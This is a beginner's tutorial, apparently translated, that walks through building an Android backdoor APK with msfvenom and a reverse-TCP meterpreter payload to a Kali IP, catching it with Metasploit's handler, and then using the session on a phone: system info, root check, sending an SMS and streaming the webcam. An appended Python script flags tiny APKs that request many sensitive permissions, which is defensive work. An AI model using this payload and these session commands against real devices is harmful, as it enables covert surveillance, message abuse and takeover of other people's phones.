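A beginner's tutorial; experts, please don't flame.
When following along, change the IPs to those of your own environment.
Generating the APK backdoor
Kali Linux (Hack): 192.168.169.76
Android (target machine): 192.168.169.137
Start Kali, open a terminal and generate the APK backdoor. The APK is only 9.2k, which is pretty impressive.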
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes
lhost is Kali's IP; lport specifies a port.
Starting a listener in the Metasploit console
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp # set the payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 # Kali's IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 # matches the port set earlier
lport => 445
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
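Copy the APK out, install it on the phone and open it; then you can run exploit, and you will see the session connect back.
You can look at the help to see which operations are available.
meterpreter > help
Feature examples
Reading contacts and messages, taking photos, recording audio, getting location information, uploading and downloading files, and so on; it is quite powerful.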
# System information
meterpreter > sysinfo
Computer : localhost
OS : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android
# Check root status
meterpreter > check_root
[+] Device is rooted
# Send an SMS
meterpreter > send_sms
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."
OPTIONS:
-d <opt> Destination number
-dr Wait for delivery report
-h Help Banner
-t <opt> SMS body text
meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
# Web video chat (did not open: my phone has no suitable browser)
meterpreter > webcam_chat
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine
# Webcam video stream in a web page, showing the live picture
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...
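From the defender's side, each feature listed above depends on an Android permission, so an APK of only a few kilobytes that requests most of them together with network access stands out before it is ever installed. The following is an added example, not part of the original post: it parses `aapt dump permissions` output and flags that combination; the sample outputs, package names and thresholds are constructed assumptions.

```python
import re

A = "android.permission."
# Features named in this section, mapped to the Android permissions that gate them.
CAPABILITY_PERMS = {
    "contacts": {A + "READ_CONTACTS"},
    "messages": {A + "READ_SMS", A + "SEND_SMS", A + "RECEIVE_SMS"},
    "camera": {A + "CAMERA"},
    "audio": {A + "RECORD_AUDIO"},
    "location": {A + "ACCESS_FINE_LOCATION", A + "ACCESS_COARSE_LOCATION"},
}
# Assumed triage thresholds (not from the page); tune them for your own app population.
MAX_SMALL_APK_BYTES = 100 * 1024
MIN_GROUPS = 4

# Accepts both aapt styles: "name='android.permission.X'" and bare "android.permission.X".
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?([\w.]+)'?", re.M)

def parse_permissions(aapt_text):
    """Return the set of permission names found in `aapt dump permissions` output."""
    return set(PERM_RE.findall(aapt_text))

def triage(aapt_text, apk_size_bytes):
    """Flag a very small APK that has network access plus several sensitive capabilities."""
    perms = parse_permissions(aapt_text)
    groups = sorted(g for g, needed in CAPABILITY_PERMS.items() if perms & needed)
    suspicious = (
        apk_size_bytes <= MAX_SMALL_APK_BYTES
        and A + "INTERNET" in perms
        and len(groups) >= MIN_GROUPS
    )
    return {"groups": groups, "suspicious": suspicious}

# Constructed samples for illustration; not captured from the APK built on this page.
TINY_SAMPLE = """package: com.example.sample
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.SEND_SMS'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
"""
BENIGN_SAMPLE = """package: com.example.scanner
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.CAMERA'
"""
if __name__ == "__main__":
    print(triage(TINY_SAMPLE, 9486))      # 9486 bytes is the payload size shown above
    print(triage(BENIGN_SAMPLE, 9486))
```

A hit is a reason to pull the APK for manual review, not a verdict; large legitimate apps can request the same permissions, which is why the size bound is part of the rule.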
Supplement, an article on FreeBuf: